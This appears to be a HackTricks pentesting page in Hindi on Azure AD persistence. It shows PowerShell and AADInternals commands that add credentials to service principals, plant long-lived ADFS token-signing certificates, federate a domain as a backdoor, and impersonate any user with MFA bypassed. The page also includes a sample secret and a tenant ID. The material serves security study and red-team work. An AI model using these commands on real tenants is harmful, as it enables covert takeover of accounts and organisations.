Az - Persistence

Support HackTricks

डिफ़ॉल्ट रूप से, कोई भी उपयोगकर्ता Azure AD में एक एप्लिकेशन पंजीकृत कर सकता है। इसलिए आप एक एप्लिकेशन पंजीकृत कर सकते हैं (केवल लक्षित टेनेट के लिए) जिसे उच्च प्रभाव की अनुमतियों की आवश्यकता होती है जिसमें व्यवस्थापक की सहमति (यदि आप व्यवस्थापक हैं तो इसे अनुमोदित करें) - जैसे कि किसी उपयोगकर्ता की ओर से मेल भेजना, भूमिका प्रबंधन आदि। यह हमें फिशिंग हमलों को निष्पादित करने की अनुमति देगा जो सफलता की स्थिति में बहुत लाभकारी होंगे।

इसके अलावा, आप उस एप्लिकेशन को अपने उपयोगकर्ता के रूप में स्वीकार कर सकते हैं ताकि उस पर पहुंच बनाए रख सकें।

Applications and Service Principals

एप्लिकेशन प्रशासक, GA या microsoft.directory/applications/credentials/update अनुमतियों के साथ एक कस्टम भूमिका के विशेषाधिकारों के साथ, हम एक मौजूदा एप्लिकेशन में क्रेडेंशियल (गुप्त या प्रमाणपत्र) जोड़ सकते हैं।

यह उच्च अनुमतियों वाले एप्लिकेशन को लक्षित करना या उच्च अनुमतियों के साथ एक नया एप्लिकेशन जोड़ना संभव है।

एप्लिकेशन में जोड़ने के लिए एक दिलचस्प भूमिका विशेषाधिकार प्राप्त प्रमाणीकरण प्रशासक भूमिका होगी क्योंकि यह वैश्विक प्रशासकों का पासवर्ड रीसेट करने की अनुमति देती है।

यह तकनीक MFA को बायपास करने की भी अनुमति देती है।

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
  • प्रमाणपत्र आधारित प्रमाणीकरण के लिए

Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

Federation - Token Signing Certificate

DA विशेषाधिकार के साथ ऑन-प्रेम AD पर, नए Token signing और Token Decrypt certificates बनाना और आयात करना संभव है जिनकी वैधता बहुत लंबी होती है। यह हमें किसी भी उपयोगकर्ता के रूप में लॉग-इन करने की अनुमति देगा जिसका ImuutableID हमें पता है।

ADFS सर्वर(s) पर DA के रूप में नए सर्टिफिकेट बनाने के लिए नीचे दिए गए कमांड को चलाएँ (डिफ़ॉल्ट पासवर्ड 'AADInternals'), उन्हें ADFS में जोड़ें, ऑटो रोलओवर को अक्षम करें और सेवा को पुनः प्रारंभ करें:

New-AADIntADFSSelfSignedCertificates

फिर, Azure AD के साथ प्रमाणपत्र जानकारी को अपडेट करें:

Update-AADIntADFSFederationSettings -Domain cyberranges.io

Federation - Trusted Domain

GA विशेषाधिकारों के साथ एक टेनेट पर, एक नया डोमेन जोड़ना संभव है (इसकी पुष्टि होनी चाहिए), इसके प्रमाणीकरण प्रकार को फेडरेटेड पर कॉन्फ़िगर करना और डोमेन को एक विशिष्ट प्रमाणपत्र (नीचे दिए गए कमांड में any.sts) और जारीकर्ता पर विश्वास करने के लिए कॉन्फ़िगर करना:

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

संदर्भ

HackTricks का समर्थन करें

Last updated